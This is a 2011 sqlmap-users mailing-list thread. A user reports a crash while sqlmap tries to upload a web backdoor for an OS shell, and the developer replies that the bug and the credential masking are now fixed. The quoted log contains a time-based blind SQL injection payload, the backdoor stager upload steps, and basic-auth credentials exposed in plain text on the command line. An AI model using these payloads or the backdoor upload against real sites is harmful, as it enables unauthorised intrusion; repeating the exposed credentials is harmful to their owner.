hi nightman. thank you fpr your report and find it fixed in the latest commit. also, i've realized this moment that our "masking" logic for command line exceptions was broken for a month or two. sorry people. it should be fixed now (automatic masking of things like --auth-cred, -u... should be working just fine). kr On Wed, Jun 29, 2011 at 7:05 PM, <nig...@em...> wrote: > I tryed to upload the webbackdoor with no Knowledge of the webserver document root. The result is a Bug. > > [18:52:39] [INFO] heuristics detected web page charset 'ascii' > sqlmap identified the following injection points with a total of 0 HTTP(s) requests: > --- > Place: GET > Parameter: n > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/ > 001Ccmg.avi&cmd=altern > --- > > [18:52:39] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Fedora 5 (Bordeaux) > web application technology: Apache 2.2.0, PHP 5.1.6 > back-end DBMS: MySQL 5 > [18:52:39] [INFO] going to use a web backdoor for command prompt > [18:52:39] [INFO] fingerprinting the back-end DBMS operating system > [18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please > wait.. > [18:52:47] [INFO] the back-end DBMS operating system is Linux > [18:52:47] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP >> 3 > [18:52:53] [WARNING] unable to retrieve the web server document root > please provide the web server document root [/var/www/]: > [18:55:06] [INFO] retrieved web server full paths: '/members/video.php' > please provide any additional web server full path to try to upload the agent [Enter for None]: > [18:55:15] [WARNING] HTTP error codes detected during testing: > 403 (Forbidden) - 1 times > > [18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest developmen > t version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lis > ts.sourceforge.net the following text and any information required to reproduce the bug. The developers will t > ry to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4198) > Python version: 2.7.1 > Operating system: nt > Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl= > ************************************************************************************************************** > ************************************************************************************************************** > ************************************************************************************************************** > ************************************************************************************************************** > *************************************************************************************************** > --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell > Technique: TIME > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main > start() > File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start > action() > File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action > conf.dbmsHandler.osShell() > File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell > self.initEnv(web=web) > File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv > self.webInit() > File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit > uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage > conn = urllib2.urlopen(req) > File "C:\Python27\lib\urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "C:\Python27\lib\urllib2.py", line 392, in open > response = self._open(req, data) > File "C:\Python27\lib\urllib2.py", line 410, in _open > '_open', req) > File "C:\Python27\lib\urllib2.py", line 370, in _call_chain > result = func(*args) > File "C:\Python27\lib\urllib2.py", line 1186, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "C:\Python27\lib\urllib2.py", line 1127, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > File "C:\Python27\lib\httplib.py", line 681, in __init__ > self._set_hostport(host, port) > File "C:\Python27\lib\httplib.py", line 706, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '80\' > > [*] shutting down at 18:55:15 > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: <nig...@em...> - 2011-06-29 17:05:49
|
I tryed to upload the webbackdoor with no Knowledge of the webserver document root. The result is a Bug. [18:52:39] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: n Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/ 001Ccmg.avi&cmd=altern --- [18:52:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux Fedora 5 (Bordeaux) web application technology: Apache 2.2.0, PHP 5.1.6 back-end DBMS: MySQL 5 [18:52:39] [INFO] going to use a web backdoor for command prompt [18:52:39] [INFO] fingerprinting the back-end DBMS operating system [18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [18:52:47] [INFO] the back-end DBMS operating system is Linux [18:52:47] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3 [18:52:53] [WARNING] unable to retrieve the web server document root please provide the web server document root [/var/www/]: [18:55:06] [INFO] retrieved web server full paths: '/members/video.php' please provide any additional web server full path to try to upload the agent [Enter for None]: [18:55:15] [WARNING] HTTP error codes detected during testing: 403 (Forbidden) - 1 times [18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest developmen t version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lis ts.sourceforge.net the following text and any information required to reproduce the bug. The developers will t ry to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4198) Python version: 2.7.1 Operating system: nt Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl= ************************************************************************************************************** ************************************************************************************************************** ************************************************************************************************************** ************************************************************************************************************** *************************************************************************************************** --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell Technique: TIME Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main start() File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start action() File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action conf.dbmsHandler.osShell() File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell self.initEnv(web=web) File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv self.webInit() File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage conn = urllib2.urlopen(req) File "C:\Python27\lib\urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "C:\Python27\lib\urllib2.py", line 392, in open response = self._open(req, data) File "C:\Python27\lib\urllib2.py", line 410, in _open '_open', req) File "C:\Python27\lib\urllib2.py", line 370, in _call_chain result = func(*args) File "C:\Python27\lib\urllib2.py", line 1186, in http_open return self.do_open(httplib.HTTPConnection, req) File "C:\Python27\lib\urllib2.py", line 1127, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "C:\Python27\lib\httplib.py", line 681, in __init__ self._set_hostport(host, port) File "C:\Python27\lib\httplib.py", line 706, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '80\' [*] shutting down at 18:55:15 |
48 messages has been excluded from this view by a project administrator.
